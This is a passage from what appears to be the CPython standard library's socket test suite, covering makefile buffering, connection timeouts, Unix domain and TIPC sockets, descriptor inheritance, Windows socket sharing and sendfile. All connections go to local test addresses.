self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except socket.timeout:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('socket.timeout not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = array.array("B", [0] * len(MSG))
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
buf = buf.tobytes()
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
try:
f = open("/proc/modules")
except (FileNotFoundError, IsADirectoryError, PermissionError):
# It's ok if the file does not exist, is a directory or if we
# have not the permission to read it.
return False
with f:
for line in f:
if line.startswith("tipc "):
return True
return False
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), timeout)
self.assertTrue(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
if timeout == 0:
# timeout == 0: means that getblocking() must be False.
self.assertFalse(s.getblocking())
else:
# If timeout > 0, the socket will be in a "blocking" mode
# from the standpoint of the Python API. For Python socket
# object, "blocking" means that operations like 'sock.recv()'
# will block. Internally, file descriptors for
# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking socket
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
